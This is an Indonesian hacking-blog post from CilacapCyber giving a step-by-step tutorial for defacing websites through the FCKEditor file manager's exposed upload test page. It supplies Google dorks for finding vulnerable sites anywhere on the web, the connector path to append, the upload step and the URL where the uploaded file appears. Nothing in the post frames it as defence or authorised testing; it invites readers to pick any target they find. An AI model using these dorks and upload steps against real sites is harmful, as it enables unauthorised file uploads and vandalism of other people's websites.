CilacapCyber - Balik lagi dengan mimin kali ini mimin akan mengshare kepada sobat yaitu cara Deface Website dengan menggunakan exploit dari FCKEditor. tapi sobat harus tau ada perbedaan dari teknik tersebut yaitu sobat hanya mengupload file TXT aja :D.
Langkah Pertama
Langkah pertama yang harus sobat lakukan adalah dengan dorking di google dorknya udah mimin kasih dibawah ini :
Dork…
Inurl: fckeditor/editor/
Inurl:filemanager/connectors/ site: bebas
inurl:connectors/uploadtest.html site: bebas
Setelah sobat dorking di google lalu sobat pilih yang mau di eksekusi :D
Langkah Kedua
Sobat harus masukin exploit : /admin/includes/rte/editor/filemanager/browser/default/connectors/test.html
Maka nantinya akan seperti ini sobat :
https://localshost/php/FCKeditor/editor/filemanager/browser/default/connectors/test.html
Langkah Ketiga
Sekarang sobat tinggal klik “Telusuri…” pada bagian Form “File Upload” setelah itu upload dehh…
Upload filenya .TXT ya… 😂
Nah kalau tandanya “file uploaded with no error” berarti file upload sobat berhasil
Langkah Keempat
Cari file uploadtan sobat tadi dengan… Klik get folder and files…
nah kalau file upload sobat udah keliatan (udah ada) langsung aja cek url dengan menambahkan “/php/userfiles/file/”
kata kunci : https://localshost/php/userfiles/file/[file kamu]
Read More : https://www.cilacapcyber.my.id/2021/03/simple-deface-txt-tutor-deface-fckeditor.html